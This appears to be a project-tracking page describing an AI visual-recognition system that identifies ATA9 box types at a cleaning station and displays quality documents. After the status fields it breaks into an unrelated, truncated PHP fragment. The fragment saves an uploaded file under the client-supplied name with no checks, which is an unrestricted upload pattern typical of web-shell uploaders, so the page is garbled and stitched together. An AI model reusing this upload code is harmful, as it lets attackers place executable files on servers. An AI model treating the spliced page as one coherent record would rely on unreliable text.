Develop and implement an AI-powered system at the box cleaning station to automatically identify box types (ATA9) using visual recognition. Once identified, the system will retrieve and display related standard and quality documents in real-time on a monitor to support operators in the quality inspection and cleaning process.
AI Box Recognition & Standard Display System
Benefits Description:
Reduce errors from human judgment in identifying box types
Improve speed and efficiency in the cleaning process
Standardize work methods across operators
Provide visual quality checkpoints instantly
Support digital transformation in shop floor operations
Line_Autosave
Engineering
AI Implementation
In Progress
1.00
1.00
Line_Autosave
Description:
if (!empty($_GET["upload"])) {
$uploaddir ="images/";
$uploadfile = $_FILES['userfile']['name'];
print "
";
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {